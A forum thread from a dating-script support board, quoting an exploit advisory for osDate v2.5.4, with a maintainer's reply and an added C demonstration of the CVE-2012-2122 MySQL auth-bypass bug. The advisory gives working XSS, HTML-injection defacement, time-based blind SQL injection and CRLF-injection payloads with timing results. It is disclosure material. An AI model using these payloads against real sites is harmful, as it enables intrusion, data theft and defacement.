staan

[SECURITY BREACH] maybe some test
« on: March 26, 2019, 02:06:09 AM »
http://www.exploit4arab.org/exploits/1142

Quote
osDate v254 Multi Vulnerability

=================================

Author :  indoushka

Vendor :  http://www.tufat.com/osdate.php

Dork   :  Powered by osDate ©2014

======================================

Cross site scripting (verified) :

http://127.0.0.1//public_html/index.php?page=allnews&pageno=2%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28980103%29%3C/ScRiPt%3E

Affected items

/public_html/afflogin.php
/public_html/feedback.php
/public_html/index.php
/public_html/midlogin.php
/public_html/plugins/luckySpinGender/libs/spinAgain.php
/public_html/searchmatch.php
/public_html/sendinvite.php
/public_html/supreq.php
/public_html/userpicgallery.php

Security vulnerability in MySQL/MariaDB sql/password.c :

Vulnerability description:

Sergei Golubchik posted to the oss-sec mailing list about a recently patched security flaw (CVE-2012-2122) in the MySQL and MariaDB database servers.

When a user connects to MariaDB/MySQL, a token (SHA over a password and a random scramble string) is calculated and compared with the expected value.

Because of incorrect casting, it might've happened that the token and the expected value were considered equal, even if the memcmp() returned a non-zero value.

In this case MySQL/MariaDB would think that the password is correct, even while it is not. Because the protocol uses random strings, the probability of hitting this bug is about 1/256.

Which means, if one knows a user name to connect (and "root" almost always exists), she can connect using *any* password by repeating connection attempts.

~300 attempts take only a fraction of a second, so basically account password protection is as good as nonexistent.

Affected versions:

All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.

MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

Affected items

/public_html/admin/phpinfo.php

The impact of this vulnerability :

An attacker can bypass MySQL authentication.

How to fix this vulnerability :

Upgrade to the latest version of MySQL.

( XSS / HTML Inject ) :

http://127.0.0.1/public_html/afflogin.php?errormsg=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E

Blind SQL Injection :

URL encoded POST input txtlookagestart was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

Tests performed:

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ => 3.931 s
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ => 9.969 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.967 s
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 6.942 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.92 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 1.045 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 1.03 s
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 7.02 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 1.029 s

http://127.0.0.1/public_html/searchmatch.php?lookcountry=AA&srchzip=&txtgender=M&txtlookageend=90&txtlookagestart=16&txtlookgender=M&with_photo=1

CRLF injection/HTTP response splitting :

Affected items

/public_html/midlogin.php
/public_html/userpicgallery.php

URL encoded GET input id was set to SomeCustomInjectedHeader:injected_by_trtr
URL encoded GET input type was set to SomeCustomInjectedHeader:injected_by_trtr

127.0.0.1/public_html/userpicgallery.php?id=88&type=%0d%0a%20<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>

I checked, and some XSS security breaches are still present in osDateEvo.
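Added example, not taken from the advisory, the osDate project or MySQL's source: a C reconstruction of the narrowing bug that the CVE-2012-2122 description in the quoted advisory explains, with the vulnerable comparison next to the fixed one. The `my_bool` typedef, `scaled_memcmp`, the hash values and the function names are constructed for this demonstration; a real memcmp() result depends on the libc build, which is why the advisory gives odds of about 1/256 rather than a certainty.

```c
#include <stddef.h>
#include <stdint.h>

#define SHA1_HASH_SIZE 20

/* MySQL's my_bool was a one-byte type; unsigned char keeps the int-to-byte
   narrowing well defined (modulo 256), the "incorrect casting" described. */
typedef unsigned char my_bool;

/* Constructed stand-in for an optimized libc memcmp(): C only promises the
   sign, so a first-byte difference scaled by 256 is a conforming result. */
static int scaled_memcmp(const uint8_t *a, const uint8_t *b, size_t n) {
  for (size_t i = 0; i < n; i++)
    if (a[i] != b[i])
      return ((int)a[i] - (int)b[i]) * 256;
  return 0;
}

/* Vulnerable pattern (CVE-2012-2122 as described above): the int is narrowed
   to one byte, so a nonzero result divisible by 256 becomes 0 = "match". */
static my_bool check_scramble_vulnerable(const uint8_t *want, const uint8_t *got) {
  return (my_bool)scaled_memcmp(want, got, SHA1_HASH_SIZE);
}

/* Fixed pattern: collapse to 0/1 before narrowing; nonzero stays nonzero. */
static my_bool check_scramble_fixed(const uint8_t *want, const uint8_t *got) {
  return scaled_memcmp(want, got, SHA1_HASH_SIZE) != 0;
}

/* 1 if a raw memcmp() result vanishes under the narrowing: with results
   spread over the int range that is one value in 256, the advisory's odds. */
static int truncated_to_zero(int memcmp_result) {
  return (my_bool)memcmp_result == 0;
}

/* Constructed sample hashes that differ only in their first byte. */
static const uint8_t HASH_A[SHA1_HASH_SIZE] = {
  0x5a, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x99,
  0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff, 0x01, 0x02, 0x03, 0x04 };
static const uint8_t HASH_B[SHA1_HASH_SIZE] = {
  0x7f, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x99,
  0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff, 0x01, 0x02, 0x03, 0x04 };

/* 1 if the check accepts the two different hashes as equal (a false login). */
static int vulnerable_accepts_mismatch(void) {
  return check_scramble_vulnerable(HASH_A, HASH_B) == 0;
}
static int fixed_accepts_mismatch(void) {
  return check_scramble_fixed(HASH_A, HASH_B) == 0;
}
```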

Pharg

Re: [SECURITY BREACH] maybe some test
« Reply #1 on: March 26, 2019, 05:54:42 AM »
Hi Stann,

That's for the old osDate v2.5.4 which is no longer used.

What are the issues in osDateEvo v1.3, if any?
Regards,
Pharg ( Phill )

Don't Personal Message me unless it's about a sensitive matter!!

REMEMBER TO ALWAYS BACKUP BEFORE MAKING ANY CHANGES!!

osDateEvo v1.3 | PHP: 5.3.42 & PHP: 7.2 | MySQL: 5.5.35